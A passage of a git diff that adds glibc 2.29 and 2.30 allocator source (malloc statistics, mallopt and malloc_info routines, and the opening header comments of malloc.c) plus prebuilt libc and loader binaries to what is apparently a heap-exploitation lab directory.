+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so
new file mode 100755
index 0000000..b5c4af5
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/ld-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so
new file mode 100755
index 0000000..2f5acd8
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/.debug/libc-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so
new file mode 100755
index 0000000..0344b0e
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2 b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2
new file mode 120000
index 0000000..1b67396
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/ld.so.2
@@ -0,0 +1 @@
+ld-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so
new file mode 100755
index 0000000..abf6515
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc-2.29.so differ
diff --git a/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6 b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6
new file mode 120000
index 0000000..89bb464
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.29_ubuntu1904/libc.so.6
@@ -0,0 +1 @@
+libc-2.29.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30/ld-2.30.so b/HeapLAB/.glibc/glibc_2.30/ld-2.30.so
new file mode 100755
index 0000000..a3af14f
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.30/ld-2.30.so differ
diff --git a/HeapLAB/.glibc/glibc_2.30/ld.so.2 b/HeapLAB/.glibc/glibc_2.30/ld.so.2
new file mode 120000
index 0000000..694f035
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30/ld.so.2
@@ -0,0 +1 @@
+ld-2.30.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30/libc-2.30.so b/HeapLAB/.glibc/glibc_2.30/libc-2.30.so
new file mode 100755
index 0000000..cb9fcaa
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.30/libc-2.30.so differ
diff --git a/HeapLAB/.glibc/glibc_2.30/libc.so.6 b/HeapLAB/.glibc/glibc_2.30/libc.so.6
new file mode 120000
index 0000000..a5e9e38
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30/libc.so.6
@@ -0,0 +1 @@
+libc-2.30.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.30/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.30/malloc/malloc.c
new file mode 100644
index 0000000..00ce48c
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.30/malloc/malloc.c
@@ -0,0 +1,5589 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2019 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
